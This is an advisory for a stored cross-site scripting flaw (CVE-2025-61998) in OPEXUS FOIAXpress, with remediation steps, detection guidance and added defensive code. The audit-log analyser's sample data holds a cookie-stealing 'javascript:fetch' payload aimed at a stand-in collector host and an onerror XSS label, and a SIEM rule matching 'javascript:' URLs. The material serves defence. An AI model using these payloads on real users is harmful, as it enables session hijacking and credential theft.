CVE-2025-61998

4.3 MEDIUM

📋 TL;DR

This is a stored cross-site scripting (XSS) issue in OPEXUS FOIAXpress: administrative users can save malicious JavaScript or other active content as entries in the Technical Support Hyperlink Manager. When other users click those links, the injected content executes in the victim's browser under the victim's session, potentially enabling session hijacking, credential theft, or unauthorized actions performed as that user. Only FOIAXpress installations before version 11.13.3.0 are affected.
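To make the defect class concrete, the following added example (not code from OPEXUS or from the original page) contrasts a naive hyperlink renderer, which places an admin-supplied label and URL into the page verbatim, with a hardened one that allow-lists URL schemes and HTML-escapes both values. The allowed schemes, the function names and the rel attribute are assumptions for illustration; the advisory does not describe how FOIAXpress renders these links internally.

```python
import html
from urllib.parse import urlsplit

# Assumption: a technical-support link only ever needs these schemes.
# Anything else (javascript:, data:, vbscript:, scheme-relative //host) is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def render_link_unsafe(label: str, url: str) -> str:
    """Naive rendering: whatever the administrator typed lands in the page.

    A 'javascript:' URL runs when clicked, and a label such as
    '<img src=x onerror=...>' runs as soon as the page is viewed.
    """
    return f'<a href="{url}">{label}</a>'


def validate_url(url: str) -> bool:
    """Return True only for an absolute http(s) URL with a host, or a mailto: URL.

    urlsplit lowercases the scheme, so 'JavaScript:' is caught as well, and a
    scheme-relative '//collector.example.net/' parses with an empty scheme.
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False
    if scheme in {"http", "https"} and not parts.netloc:
        return False
    return True


def render_link_safe(label: str, url: str) -> str:
    """Hardened rendering: validate the target, then escape both attribute and text context."""
    if not validate_url(url):
        raise ValueError(f"disallowed hyperlink target: {url!r}")
    return (
        f'<a href="{html.escape(url, quote=True)}" rel="noopener noreferrer">'
        f"{html.escape(label)}</a>"
    )
```

Validation happens on save (the admin-facing Hyperlink Manager) and escaping on render, so a value that slips past one control is still neutralised by the other.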

💻 Affected Systems

Products:
  • OPEXUS FOIAXpress
Versions: All versions before 11.13.3.0
Operating Systems: Windows Server (typical deployment)
Default Config Vulnerable: ⚠️ Yes
Notes: Requires administrative access to the Technical Support Hyperlink Manager feature. All default configurations with vulnerable versions are affected.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrative user compromises other user accounts, steals sensitive data, performs unauthorized actions on behalf of victims, and potentially gains persistent access to the system.

🟠

Likely Case

Malicious or compromised admin injects JavaScript to steal session cookies or credentials from other users, leading to unauthorized access and potential data exfiltration.

🟢

If Mitigated

With proper access controls and monitoring, impact is limited to isolated incidents that can be quickly detected and contained.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires administrative privileges to inject malicious content. The attack then relies on other users clicking the malicious links.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 11.13.3.0

Vendor Advisory: https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf

Restart Required: No

Instructions:

1. Download FOIAXpress version 11.13.3.0 or later from OPEXUS.
2. Follow standard upgrade procedures per OPEXUS documentation.
3. Verify the upgrade completed successfully.

🔧 Temporary Workarounds

Restrict Administrative Access

Limit administrative privileges to only trusted personnel who require access to the Technical Support Hyperlink Manager.

User Education

Train users to be cautious when clicking links, especially those that appear suspicious or unexpected.

🧯 If You Can't Patch

  • Implement strict monitoring of administrative actions in the Technical Support Hyperlink Manager.
  • Apply principle of least privilege and review all administrative user accounts for necessity.

🔍 How to Verify

Check if Vulnerable:

Check the FOIAXpress version in the application settings or administrative console. If the version is below 11.13.3.0, the system is vulnerable. Compare the components numerically, not as text: 11.9.x.x is older than 11.13.3.0 even though "9" sorts after "1" in a string comparison.

Check Version:

Check within FOIAXpress administrative interface under Help > About or similar version information section.

Verify Fix Applied:

Confirm the installed version is 11.13.3.0 or higher via the application's version information.
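An added example (not from the page or from OPEXUS) of the version check described above, written so that it can be dropped into an inventory or compliance script. It extracts a dotted version from an About-dialog or banner string, pads it to four components, and compares numerically; the fixed version 11.13.3.0 comes from this advisory, while the input strings are constructed.

```python
import re

# Fixed release named in the advisory.
FIXED_VERSION = "11.13.3.0"


def parse_version(text: str) -> tuple[int, ...]:
    """Extract a dotted numeric version from free text and normalise to four components.

    '11.13.3' and '11.13.3.0' compare equal; components are compared as integers
    so that 11.9.0.0 correctly sorts before 11.13.3.0.
    """
    match = re.search(r"\d+(?:\.\d+)+", text)
    if not match:
        raise ValueError(f"no version number found in {text!r}")
    parts = [int(p) for p in match.group(0).split(".")]
    parts += [0] * (4 - len(parts))
    return tuple(parts[:4])


def is_vulnerable(version_text: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is older than the fixed release."""
    return parse_version(version_text) < parse_version(fixed)


if __name__ == "__main__":
    # Constructed sample About strings; the second one is the string-compare trap.
    for banner in ("FOIAXpress 11.13.3.0", "FOIAXpress 11.9.0.0", "Version 11.14.0"):
        print(f"{banner!r}: vulnerable={is_vulnerable(banner)}")
```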

📡 Detection & Monitoring

Log Indicators:

  • Unusual administrative activity in Technical Support Hyperlink Manager
  • Multiple users accessing suspicious URLs from the same hyperlink

Network Indicators:

  • Outbound connections to unexpected domains following hyperlink clicks
  • Unusual data exfiltration patterns

SIEM Query:

source="foiaxpress" AND (event_type="hyperlink_modification" OR url_contains="javascript:")

The field names above are illustrative; map them to the audit-log schema your FOIAXpress deployment actually emits and to your SIEM's query syntax before relying on the rule.
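The log and network indicators above can be turned into a small offline review of the Hyperlink Manager audit trail. The following is an added example, not code from the page or from OPEXUS: the JSON-lines record shape, the field names (event, actor, link_id, label, url), the trusted-host set and the sample records are all constructed assumptions, since the advisory does not document the product's real log format. It flags link changes whose target uses a disallowed scheme or an unexpected host, labels that carry markup, and a single link followed by many distinct users.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumptions for this example: hosts a support link may legitimately point at,
# and the URL schemes the Hyperlink Manager should ever contain.
TRUSTED_HOSTS = {"support.example.gov", "docs.opexustech.com"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# A tag opener, an inline script URL, or an on*= handler inside a link label.
MARKUP = re.compile(r"<[a-zA-Z!/]|javascript:|on\w+\s*=", re.I)

# Constructed sample audit records (one JSON object per line); the schema is invented.
SAMPLE_LOG = """
{"ts":"2025-10-01T09:00:01Z","event":"hyperlink_modified","actor":"admin.jsmith","link_id":"17","label":"Support Portal","url":"https://support.example.gov/foia"}
{"ts":"2025-10-01T09:02:14Z","event":"hyperlink_modified","actor":"admin.contractor","link_id":"18","label":"Help Desk","url":"javascript:fetch('https://collector.example.net/?c='+document.cookie)"}
{"ts":"2025-10-01T09:03:40Z","event":"hyperlink_modified","actor":"admin.contractor","link_id":"19","label":"<img src=x onerror=alert(1)>","url":"https://support.example.gov/faq"}
{"ts":"2025-10-01T09:04:05Z","event":"hyperlink_modified","actor":"admin.contractor","link_id":"20","label":"Live Chat","url":"https://collector.example.net/chat"}
{"ts":"2025-10-01T09:10:00Z","event":"hyperlink_clicked","actor":"user.alvarez","link_id":"18"}
{"ts":"2025-10-01T09:11:30Z","event":"hyperlink_clicked","actor":"user.chen","link_id":"18"}
{"ts":"2025-10-01T09:12:45Z","event":"hyperlink_clicked","actor":"user.okafor","link_id":"18"}
{"ts":"2025-10-01T09:13:00Z","event":"hyperlink_clicked","actor":"user.alvarez","link_id":"17"}
"""


def review_link_change(rec: dict) -> list[str]:
    """Return the reasons a hyperlink_modified record deserves analyst attention."""
    findings = []
    parts = urlsplit(rec.get("url", "").strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        findings.append("disallowed_scheme")          # javascript:, data:, vbscript:, ...
    elif parts.hostname and parts.hostname not in TRUSTED_HOSTS:
        findings.append("untrusted_host")             # outbound to an unexpected domain
    if MARKUP.search(rec.get("label", "")):
        findings.append("markup_in_label")            # label itself carries HTML/script
    return findings


def analyze(log_text: str, click_threshold: int = 3) -> list[dict]:
    """Walk the audit trail once; emit alerts for bad edits and widely followed links."""
    alerts = []
    clickers: dict[str, set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec["event"] == "hyperlink_modified":
            findings = review_link_change(rec)
            if findings:
                alerts.append({"ts": rec["ts"], "link_id": rec["link_id"],
                               "actor": rec["actor"], "findings": findings})
        elif rec["event"] == "hyperlink_clicked":
            clickers[rec["link_id"]].add(rec["actor"])
    # Many distinct users following one link is the "multiple users accessing
    # suspicious URLs from the same hyperlink" indicator.
    for link_id, users in clickers.items():
        if len(users) >= click_threshold:
            alerts.append({"ts": None, "link_id": link_id, "actor": None,
                           "findings": ["widely_followed_link"], "viewers": len(users)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Tune click_threshold to the size of the user base; on a small FOIA office three distinct viewers may be normal traffic, in which case the scheme and host checks on the modification events carry the detection on their own.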
